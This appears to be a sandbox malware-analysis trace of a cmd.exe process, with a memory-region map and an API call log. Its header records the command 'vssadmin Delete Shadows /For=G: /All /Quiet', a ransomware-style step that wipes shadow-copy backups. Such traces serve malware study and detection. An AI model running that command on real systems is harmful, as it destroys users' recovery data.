	page_root = "0x5b6ff000"
	os_pid = "0x11c8"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x117c"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C vssadmin Delete Shadows /For=G: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 5090
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 5091
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 5092
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 5093
	        start_va = 0x90000
	          end_va = 0x18ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 5094
	        start_va = 0x190000
	          end_va = 0x193fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000190000"
	        filename = ""

Region:
	              id = 5095
	        start_va = 0x1a0000
	          end_va = 0x1a0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000001a0000"
	        filename = ""

Region:
	              id = 5096
	        start_va = 0x1b0000
	          end_va = 0x1b1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001b0000"
	        filename = ""

Region:
	              id = 5097
	        start_va = 0x290000
	          end_va = 0x291fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000290000"
	        filename = ""

Region:
	              id = 5098
	        start_va = 0x2f0000
	          end_va = 0x341fff
	       monitored = 1
	     entry_point = 0x304fd0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")

Region:
	              id = 5099
	        start_va = 0x350000
	          end_va = 0x434ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000350000"
	        filename = ""

Region:
	              id = 5100
	        start_va = 0x4400000
	          end_va = 0x45fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004400000"
	        filename = ""

Region:
	              id = 5101
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 5102
	        start_va = 0x7f4b0000
	          end_va = 0x7f4d2fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007f4b0000"
	        filename = ""

Region:
	              id = 5103
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 5104
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 5105
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 5106
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 5107
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 5108
	        start_va = 0x1c0000
	          end_va = 0x1cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 5111
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 5112
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 5113
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 5133
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 5134
	        start_va = 0x4600000
	          end_va = 0x48bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004600000"
	        filename = ""

Region:
	              id = 5135
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 5143
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 5144
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 5145
	        start_va = 0x7f3b0000
	          end_va = 0x7f4affff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007f3b0000"
	        filename = ""

Region:
	              id = 5283
	        start_va = 0x1d0000
	          end_va = 0x28dfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 5284
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 5285
	        start_va = 0x290000
	          end_va = 0x2cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000290000"
	        filename = ""

Region:
	              id = 5286
	        start_va = 0x4600000
	          end_va = 0x46fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004600000"
	        filename = ""

Region:
	              id = 5287
	        start_va = 0x47c0000
	          end_va = 0x48bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000047c0000"
	        filename = ""

Region:
	              id = 5288
	        start_va = 0x48c0000
	          end_va = 0x499ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000048c0000"
	        filename = ""

Region:
	              id = 5289
	        start_va = 0x2d0000
	          end_va = 0x2d3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000002d0000"
	        filename = ""

Region:
	              id = 5321
	        start_va = 0x2e0000
	          end_va = 0x2e3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000002e0000"
	        filename = ""

Region:
	              id = 5358
	        start_va = 0x49a0000
	          end_va = 0x4cd6fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")


Thread:
	id = 375
	os_tid = 0x1288

	[0308.888] GetProcAddress (hModule=0x76d90000, lpProcName="SetConsoleInputExeNameW") returned 0x746ab440
	[0308.889] GetProcessHeap () returned 0x47c0000
	[0308.889] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0x400a) returned 0x47cb998
	[0308.889] GetProcessHeap () returned 0x47c0000
	[0308.890] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47cb998) returned 1
	[0308.892] _wcsicmp (_String1="vssadmin", _String2=")") returned 77
	[0308.892] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16
	[0308.892] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16
	[0308.892] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13
	[0308.892] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13
	[0308.892] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4
	[0308.892] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4
	[0308.892] GetProcessHeap () returned 0x47c0000
	[0308.893] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0x58) returned 0x47c74f8
	[0308.893] GetProcessHeap () returned 0x47c0000
	[0308.893] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0x1a) returned 0x47c9048
	[0308.895] GetProcessHeap () returned 0x47c0000
	[0308.895] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0x52) returned 0x47c9070
	[0308.898] GetConsoleTitleW (in: lpConsoleTitle=0x18fa18, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0309.174] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0309.174] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0309.174] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0309.174] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0309.174] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0309.174] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0309.175] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0309.175] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0309.175] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0309.175] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0309.175] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0309.175] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0309.175] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0309.175] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0309.175] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0309.175] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0309.175] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0309.175] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0309.175] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0309.176] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0309.176] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0309.176] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0309.176] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0309.176] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0309.176] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0309.176] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0309.176] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0309.176] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0309.176] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0309.176] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0309.176] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0309.176] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0309.176] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0309.177] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0309.177] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0309.177] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0309.177] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0309.177] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0309.177] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0309.177] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0309.177] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0309.177] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0309.177] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0309.177] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0309.177] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0309.178] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0309.178] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0309.178] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0309.178] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0309.178] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0309.178] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0309.178] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0309.178] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0309.178] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0309.178] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0309.178] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0309.178] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0309.178] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0309.179] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0309.179] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0309.179] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0309.179] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0309.179] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0309.179] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0309.179] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0309.179] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0309.179] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0309.179] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0309.179] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0309.179] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0309.179] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0309.180] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0309.180] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0309.180] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0309.180] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0309.180] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0309.180] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0309.180] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0309.180] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0309.180] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0309.180] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0309.180] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0309.180] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0309.180] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0309.181] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16
	[0309.181] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13
	[0309.181] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4
	[0309.182] GetProcessHeap () returned 0x47c0000
	[0309.182] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0x210) returned 0x47c90d0
	[0309.182] GetProcessHeap () returned 0x47c0000
	[0309.182] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0x64) returned 0x47c92e8
	[0309.183] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19
	[0309.185] GetProcessHeap () returned 0x47c0000
	[0309.185] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0x418) returned 0x47c05c8
	[0309.185] SetErrorMode (uMode=0x0) returned 0x0
	[0309.186] SetErrorMode (uMode=0x1) returned 0x0
	[0309.186] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x47c05d0, lpFilePart=0x18f524 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x18f524*="Desktop") returned 0x1d
	[0309.186] SetErrorMode (uMode=0x0) returned 0x1
	[0309.186] GetProcessHeap () returned 0x47c0000
	[0309.186] RtlReAllocateHeap (Heap=0x47c0000, Flags=0x0, Ptr=0x47c05c8, Size=0x56) returned 0x47c05c8
	[0309.186] GetProcessHeap () returned 0x47c0000
	[0309.187] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c05c8) returned 0x56
	[0309.187] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x9c
	[0309.187] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0309.188] GetProcessHeap () returned 0x47c0000
	[0309.188] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0x182) returned 0x47c9358
	[0309.188] GetProcessHeap () returned 0x47c0000
	[0309.188] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0x2fc) returned 0x47c0628
	[0309.311] GetProcessHeap () returned 0x47c0000
	[0309.311] RtlReAllocateHeap (Heap=0x47c0000, Flags=0x0, Ptr=0x47c0628, Size=0x184) returned 0x47c0628
	[0309.311] GetProcessHeap () returned 0x47c0000
	[0309.311] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c0628) returned 0x184
	[0309.311] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35
	[0309.311] GetProcessHeap () returned 0x47c0000
	[0309.311] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0xe0) returned 0x47c94e8
	[0309.317] GetProcessHeap () returned 0x47c0000
	[0309.317] RtlReAllocateHeap (Heap=0x47c0000, Flags=0x0, Ptr=0x47c94e8, Size=0x76) returned 0x47c94e8
	[0309.317] GetProcessHeap () returned 0x47c0000
	[0309.317] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c94e8) returned 0x76
	[0309.319] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0309.320] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\vssadmin.*" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18f2b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f2b0) returned 0xffffffff
	[0309.321] GetLastError () returned 0x2
	[0309.321] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0309.321] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\vssadmin.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18f2b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f2b0) returned 0xffffffff
	[0309.323] GetLastError () returned 0x2
	[0309.323] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0309.323] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*" (normalized: "c:\\windows\\syswow64\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18f2b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f2b0) returned 0x47c9568
	[0309.324] GetProcessHeap () returned 0x47c0000
	[0309.324] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x0, Size=0x14) returned 0x47c7a70
	[0309.324] FindClose (in: hFindFile=0x47c9568 | out: hFindFile=0x47c9568) returned 1
	[0309.325] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM" (normalized: "c:\\windows\\syswow64\\vssadmin.com"), fInfoLevelId=0x1, lpFindFileData=0x18f2b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f2b0) returned 0xffffffff
	[0309.325] GetLastError () returned 0x2
	[0309.325] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE" (normalized: "c:\\windows\\syswow64\\vssadmin.exe"), fInfoLevelId=0x1, lpFindFileData=0x18f2b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f2b0) returned 0x47c9568
	[0309.325] GetProcessHeap () returned 0x47c0000
	[0309.326] RtlReAllocateHeap (Heap=0x47c0000, Flags=0x0, Ptr=0x47c7a70, Size=0x4) returned 0x47c7358
	[0309.326] FindClose (in: hFindFile=0x47c9568 | out: hFindFile=0x47c9568) returned 1
	[0309.326] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0309.326] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0309.326] GetConsoleTitleW (in: lpConsoleTitle=0x18f7a4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0309.453] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f6d0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f6b4 | out: lpAttributeList=0x18f6d0, lpSize=0x18f6b4) returned 1
	[0309.453] UpdateProcThreadAttribute (in: lpAttributeList=0x18f6d0, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f6bc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f6d0, lpPreviousValue=0x0) returned 1
	[0309.453] GetStartupInfoW (in: lpStartupInfo=0x18f708 | out: lpStartupInfo=0x18f708*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) 
	[0309.454] GetProcessHeap () returned 0x47c0000
	[0309.454] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0x18) returned 0x47c7950
	[0309.454] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0309.454] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0309.454] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0309.454] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0309.454] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0309.454] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0309.454] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0309.454] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0309.454] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0309.455] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0309.455] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0309.455] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0309.455] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0309.455] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0309.455] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0309.455] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0309.455] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0309.455] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0309.455] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0309.455] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0309.455] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0309.455] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0309.456] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0309.456] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0309.456] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0309.456] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0309.456] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0309.456] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0309.456] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0309.456] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0309.456] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0309.456] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0309.456] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0309.456] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0309.456] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0309.457] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0309.457] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0309.457] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0309.457] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0309.457] GetProcessHeap () returned 0x47c0000
	[0309.457] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c7950) returned 1
	[0309.457] GetProcessHeap () returned 0x47c0000
	[0309.457] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0xa) returned 0x47c9568
	[0309.457] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1
